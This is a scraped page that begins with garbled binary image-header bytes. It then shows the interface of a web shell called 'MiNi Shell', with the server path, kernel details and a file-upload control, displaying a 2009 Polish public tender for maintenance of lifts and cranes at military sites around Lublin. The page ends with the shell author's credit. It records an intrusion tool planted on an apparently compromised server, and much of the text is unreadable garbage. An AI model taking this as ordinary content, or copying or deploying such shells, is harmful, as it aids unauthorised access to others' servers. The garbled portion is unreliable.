JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090204/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090204/17332-N-2009.html

<p class="kh_header"><b>Lublin: Konserwacja i przegląd techniczny dźwigów, suwnic i wciągników</b><br>
<b>Numer ogłoszenia: 17332 - 2009; data zamieszczenia: 04.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury Lublin , ul. Lipowa 1a, 20-020 Lublin, woj. lubelskie, tel. 081 7183530, faks 081 7183501.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i przegląd techniczny dźwigów, suwnic i wciągników.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie konserwacji bieżącej dźwigów, suwnic 
i wciągników określonych w pakietach nr 1 - 6 zgodnie z przepisami Urzędu Dozoru Technicznego, normami PN/EN- 81.1, PN/ON-81.2 oraz instrukcjami konserwacji producenta(według wykazu części (pakietównr 1, nr 2, nr 3, nr 4, nr 5 i nr 6) przedmiotu zamówienia opisanych w pkt. I.2 SIWZ).W ramach konserwacji wykonawca będzie przeprowadzał przeglądy techniczne urządzeń nie rzadziej niż raz na miesiąc zgodnie z w/w przepisami, normami i instrukcjami,   a w szczególności:-  przegląd konstrukcji nośnej w szybie dźwigu, -  przegląd kontaktów bezpieczeństwa dźwigu,
-  przegląd instalacji elektrycznej i stanu silnika urządzenia,-  przegląd tablic sterowniczych urządzenia,-  sprawdzenie stanu lin, kół ciernych i zdawczych, luzowników i łożysk urządzenia,-  sprawdzenie stanu ograniczników prędkości dźwigu,-  sprawdzenie stanu wciągarki, sprzęgieł, prowadnic przeciwwag dźwigu
-  sprawdzenie działania sygnalizacji alarmowej dźwigu,-  sprawdzenie stanu oleju
Wykonawca będzie dostarczał i wymieniał nieodpłatnie elementy wyposażenia takie jak: wkładki bezpiecznikowe, żarówki oświetlenia kabiny, przycisków i fotoimpulsora, styki stycznika sterowego, korek drzwi, soczewka przycisku sterowego, sprężyna drzwi, styk kontaktu, zwieracz kontaktu drzwi szybowych, impulsator lub inicjator, osprzęt śrubowy,  listwa zaciskowa do łączenia przewodów, kondensator tablicy sterowej, opornik tablicy sterowej i przycisku sterowego, smar, olej, czyściwo, cyna, taśma izolacyjna.Wykonawca będzie zobowiązany do:-  prowadzenia pogotowia dźwigowego dla usuwania bieżących usterek;   w przypadku konieczności naprawy czas oczekiwania na konserwatora - do 24 godzin  w przypadku unieruchomienia dźwigu z ludźmi - do 3 godzin,-  dokonywania wpisów do dziennika  urządzenia z przeprowadzonych przeglądów lub  
usunięcia usterek,-  uczestniczenia w badaniach dźwigów dokonywanych przez Urząd Dozoru Technicznego,-  wykonywania okresowych pomiarów elektroenergetycznych wymaganych przepisami  (pomiar skuteczności ochrony przeciwporażeniowej, pomiar rezystancji izolacji)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium DLA KAŻDEJ CZĘŚCI (PAKIETU) zamówienia o niżej wymienionej wartości;
PAKIET nr 1:		200 zł   (słownie: dwieście złotych)
PAKIET nr 2:	  	100 zł   (słownie: sto złotych)
PAKIET nr 3:	  	100 zł   (słownie: sto złotych)
PAKIET nr 4:		100 zł   (słownie: sto złotych)
PAKIET nr 5: 		150 zł   (słownie: sto pięćdziesiąt złotych)
PAKIET nr 6: 	            400 zł   (słownie: czterysta złotych)

2.	Wadium może być wniesione w jednej lub w kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3.	Wadium w formie pieniężnej należy wpłacić  przelewem na rachunek bankowy Rejonowego Zarządu Infrastruktury Lublin, 20-020 Lublin, ul. Lipowa 1a, konto nr: 92 1010 1339 0043 0113 9120 0000
Wadium  musi  być  wniesione  najpóźniej do godz. 13.00  dnia 16.02.2009 r.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej wymienionym terminie znajdzie się na rachunku bankowym Rejonowego Zarządu Infrastruktury Lublin.

4.	Wadium w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty o których mowa w ustawie o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w pok. nr 117, w siedzibie Rejonowego Zarządu Infrastruktury Lublin, 20-020 Lublin, ul. Lipowa 1a, najpóźniej do godz. 13.00  dnia 16.02.2009 r.
 
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną  pieczątką lub czytelny (z podaniem imienia i nazwiska).

Z treści gwarancji winno wynikać bezwarunkowe - na każde pisemne żądanie zgłoszone przez  Rejonowy Zarząd Infrastruktury Lublin, 20-020 Lublin, ul. Lipowa 1a, w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty Rejonowemu Zarządowi Infrastruktury Lublin, 20-020 Lublin, 
ul. Lipowa 1a, pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.

5.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.

6.	Zamawiający zwraca niezwłocznie wadium, jeżeli:
a)	upłynął termin związania ofertą,
b)	zawarto umowę w sprawie zamówienia publicznego,
c)	zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.	

7.	Rejonowy Zarząd Infrastruktury Lublin  niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który został wykluczony z postępowania,
c)	którego oferta została odrzucona.

8.	Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy Wykonawca:
	
a)	odmówił podpisania umowy na warunkach określonych w ofercie,
b)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.

9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy prawo zamówień publicznych, nie złożył dokumentów o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W  przetargu  mogą  wziąć  udział  wykonawcy  nie  podlegający  wykluczeniu  z  postępowania  na  podstawie  art. 24  oraz  spełniający  warunki  określone  art. 22 ust.1 - Prawa  zamówień publicznych, tj.;1)	posiadają  uprawnienia  do  wykonywania  określonej  działalności lub czynności, jeżeli ustwy nakładają obowiązek posiadania takich uprawnień, tj.; 
-prowadzą działalność gospodarczą w zakresie odpowiadającym przedmiotowi zamówienia zarejestrowaną w Krajowym Rejestrze Sądowym lub wpisaną do ewidencji działalności gospodarczej, 2)	posiadają  niezbędną  wiedzę  i  doświadczenie  oraz  dysponują potencjałem technicznym i osobami  zdolnymi  do  wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia wykonawcy potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.: -w okresie ostatnich trzech lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed wszczęciem postępowania wykonali co najmniej jedną (1) usługę odpowiadającą swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia  o udzielenie zamówienia publicznego, -dysponują osobami posiadającymi kwalifikacje do obsługi i konserwacji urządzeń technicznych (Ustawa z dnia 21 grudnia 2000r. o dozorze technicznym, Dz. U. nr 122 poz. 1321 z dnia 31 grudnia 2000r.z późn. zm wraz z przepisami wykonawczymi.)3)znajdują  się  w  sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Ocena spełnienia przez Wykonawców ww. warunków dokonana będzie zgodnie z formułą, spełnia - nie spełnia, na podstawie dokumentów i oświadczeń określonych w pkt. XV SIWZ.Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oraz przez oferowane dostawy wymagań określonych przez Zamawiającego, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli dokumenty zawierające błędy lub wadliwe pełnomocnictwa do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania; oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu wyznaczonym przez zamawiającego jako termin składania ofert.
Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 pkt. 1) i 3) - Prawa zamówień publicznych. 
Oświadczenie o spełnianiu warunku określonego w art. 22 ust.1 pkt. 2) - Prawa zamówień publicznych .
Oświadczenie  o  nie  podleganiu  wykluczeniu  z  postępowania  o  udzielenie zamówienia    publicznego na podstawie art. 24 ust 1 pkt. 1-9 Prawa zamówień publicznych. 
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, potwierdzające, że profil działania Wykonawcy odpowiada przedmiotowi zamówienia oraz zawierający aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy . 
W  przypadku,  gdy  Wykonawcą  są  przedsiębiorcy  prowadzący  działalność  gospodarczą  w  formie  spółki cywilnej, do oferty  winno  być  załączone  zaświadczenie  o  wpisie  do ewidencji  działalności  gospodarczej wystawione na  każdego  przedsiębiorcę z osobna. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności. Kserokopie dokumentów ( zaświadczeń kwalifikacyjnych) potwierdzających kwalifikacje wymagane przy obsłudze i konserwacji urządzeń technicznych dla osób wymienionych w ww. wykazie wydane przez organ właściwej jednostki dozoru technicznego (Ustawa z dnia 21 grudnia 2000r. o dozorze technicznym, Dz. U. nr 122 poz. 1321 z dnia 31 grudnia 2000r.z późn. zm. wraz z przepisami wykonawczymi.)- .Pełnomocnictwo do reprezentacji i zawarcia umowy wystawione przez wszystkich Wykonawców w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia .Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z  oryginałem  przez  Wykonawcę, na każdej zapisanej stronie dokumentu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rzi.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury Lublin, ul. Lipowa 1a, 20-020 Lublin, pok. nr 117. Opłata za SIWZ wynosi 11.02 PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 13:00, miejsce: Rejonowy Zarząd Infrastruktury Lublin, ul. Lipowa la, pokój nr 103 (kancelaria).
Oferty nadesłane pocztą również obowiązuje w/w termin..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1 - JAROSŁAW.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzajdźwigu :towarowo-osobowy, nr fabryczny:47898,Miejsce zainstalowania dźwigu i przeznaczenie budynku:	Jarosław, JW3957 bud. 41/3808 - magazynowy, ul. 3-Maja 80,	Udźwig  (kg): 1600,Liczba przystanków:2,Liczba drzwi:3; 2.Rodzaj dźwigu: towarowy,nr fabryczny:53140,Miejsce zainstalowania dźwigu i przeznaczenie budynku:Jarosław, JW3957 bud. 2/3235 - wielofunkcyjny, 
ul. Poniatowskiego 49a,Udźwig  (kg): 1000,Liczba przystanków:2, Liczba drzwi:2; 3.Rodzaj dźwigu:towarowy, nr fabryczny:54864,Miejsce zainstalowania dźwigu i przeznaczenie budynku:Jarosław, JW3957 bud. 50/3808 - stołówka,ul. 3-Maja 80, Udźwig  (kg): 160, Liczba przystanków:2, Liczba drzwi:2; 4.Rodzaj dźwigu:towarowy,nr fabryczny:48874,	Miejsce zainstalowania dźwigu i przeznaczenie budynku:Jarosław, JW3957 bud. 5/3229 Wojskowy Ośrodek Kultury, ul. Grunwaldzka 9,Udźwig  (kg):100, Liczba przystanków:2, Liczba drzwi:2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2 - NISKO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj dźwigu:towarowy PBD 200,	Numer fabryczny:52472,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Nisko, JW3527 bud. 100/3374 - stołówka , ul. Sandomierska 20,Udźwig (kg):200,Liczba Przystanków:2,Liczba drzwi:4; 2.Rodzaj dźwigu:Towarowy PBD 200,	Numer fabryczny:52473,Miejsce zainstalowania dźwigu, przeznaczenie budynku:Nisko, JW3527 bud. 100/3374 - stołówka , ul. Sandomierska 20,	Udźwig (kg):200,	Liczba Przystanków:2, Liczba drzwi:2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3 -NOWA DĘBA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj dźwigu:towarowy,	Numer fabryczny:49453,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Nowa Dęba, JW2090 bud. 508/3187 - magazyn,      ul. Anieli Krzywoń 1,Udźwig (kg):1600,	Liczba Przystanków:2,Liczba drzwi:2;
2.Rodzaj dźwigu:towarowy, 	Numer fabryczny:57394,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Nowa Dęba, JW2090 bud.509/3187- kuchnia ,        ul.Anieli Krzywoń 1 ,Udźwig (kg):250,	Liczba Przystanków:2,Liczba drzwi:2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4 - RZESZÓW.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj dźwigu:osobowy (hydrauliczny),Numer fabryczny:P06H0622,Miejsce zainstalowania dźwigu, przeznaczenie budynku:Rzeszów, JW3841 bud. 33/8105 kuchnia-stołówka, ul. Lwowska 5 ,Udźwig (kg):1000,Liczba Przystanków:2,Liczba drzwi:2;	2.Rozaj dźwigu:towarowy,Numer fabryczny:189330,Miejsce zainstalowania dźwigu, przeznaczenie budynku:Rzeszów, JW3841 bud. 33/8105 kuchnia-stołówka
 ul. Lwowska 5 ,	Udźwig (kg):100,Liczba Przystanków:2,Liczba drzwi:2;3.Rodzaj dźwigu:towarowy,	Numer fabryczny:189331,Miejsce zainstalowania dźwigu, przeznaczenie budynku:Rzeszów, JW3841 bud. 33/8105 kuchnia-stołówka, ul. Lwowska 5   , 	Udźwig (kg):100,	Liczba Przystanków:2,Liczba drzwi:2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5 - STAWY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj dźwigu:towarowo-osobowy,	Numer fabryczny:525,Miejsce zainstalowania dźwigu, przeznaczenie budynku:Stężyca, JW4824 Stawy,   bud. 17/206 - magazynowy,Udźwig (kg):1000,Liczba Przystanków:2,Liczba drzwi:4; 2.Rodzaj dźwigu:towarowo-osobowy,	Numer fabryczny:5977,Miejsce zainstalowania dźwigu, przeznaczenie budynku:Stężyca, JW4824 Stawy , bud. 26/206 - magazynowy,Udźwig (kg):1000,Liczba Przystanków:2,Liczba drzwi:4; 3.Rodzaj dźwigu:towarowo-osobowy,	Numer fabryczny:5229,Miejsce zainstalowania dźwigu, przeznaczenie budynku:Stężyca, JW4824 Stawy  , bud. 35/206 - magazynowy,Udźwig (kg):1000,Liczba Przystanków:2,Liczba drzwi:4..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6 - LUBLIN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rodzaj urządzenia dźwigowego:towarowo- osobowy,Numer fabryczny:33993,Miejsce zainstalowania dźwigu, przeznaczenie budynku:Lublin, JW4819 bud. 109/785 - magazyn, ul. Kruczkowskiego 49,	Udźwigkg):1500,Liczba 
Przystanków:2,Liczba drzwi:4, 2.Rodzaj urządzenia dźwigowego:towarowo- osobowy,	Numer fabryczny:32569,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Lublin, JW4819 bud. 165/785 - magazyn, ul.Kruczkowskiego 49,Udźwig(kg):1500,Liczba Przystanków:2,Liczba drzwi:2; 3.Rodzaj urządzenia dźwigowego:towarowo- osobowy,	Numer fabryczny:27886,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Lublin, JW4819 bud. 163/785 - magazyn,   ul. Kruczkowskiego 49,	Udźwig (kg):1500,	Liczba Przystanków:3, Liczba drzwi:5; 4.Rodzaj urządzenia dźwigowego:towarowo- osobowy,	Numer fabryczny:27885,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Lublin, JW4819 bud. 163/785 - magazyn,ul. Kruczkowskiego 49,	Udźwig(kg):1500,	Liczba 
Przystanków:3,	Liczba drzwi:5; 5.Rodzaj urządzenia dźwigowego:suwnica ręczna,	Numer fabryczny:003040,	Miejsce zainstalowania dźwigu, pprzeznaczenie budynku:Lublin, JW4819 bud. 147/785 - warsztat,  ul. Kruczkowskiego 49,	Udźwig (kg):10 000; 6.Rodzaj urządzenia dźwigowego:suwnica ręczna,	Numer fabryczny:2379 ,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Lublin, 20 RWT bud. 98/756 - warsztat, Al. Racławickie 44,	Udźwig (kg):10 000; 7.Rodzaj urządzenia dźwigowego :suwnica elektryczna,	Numer fabryczny:004418,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Lublin, JW4819 bud. 176/785 - warsztat,  ul. Kruczkowskiego 49,	Udźwig (kg):5 000; 8.Rodzaj urządzenia dźwigowego :wciągnik elektryczny linowy,	Numer fabryczny:849480,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Lublin, JW4819 bud. 65/785 - warsztat,  ul. Kruczkowskiego 49, Udźwig (kg):2 000	; 9.Rodzaj urządzenia dźwigowego :wciągnik elektryczny łańcuchowy,Numer fabryczny:001384,	Miejsce zainstalowania dźwigu, przeznaczenie budynku:Lublin, 20 RWT bud. 87/785 - warsztat,   ul. Kruczkowskiego 49,	Udźwig (kg):500..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com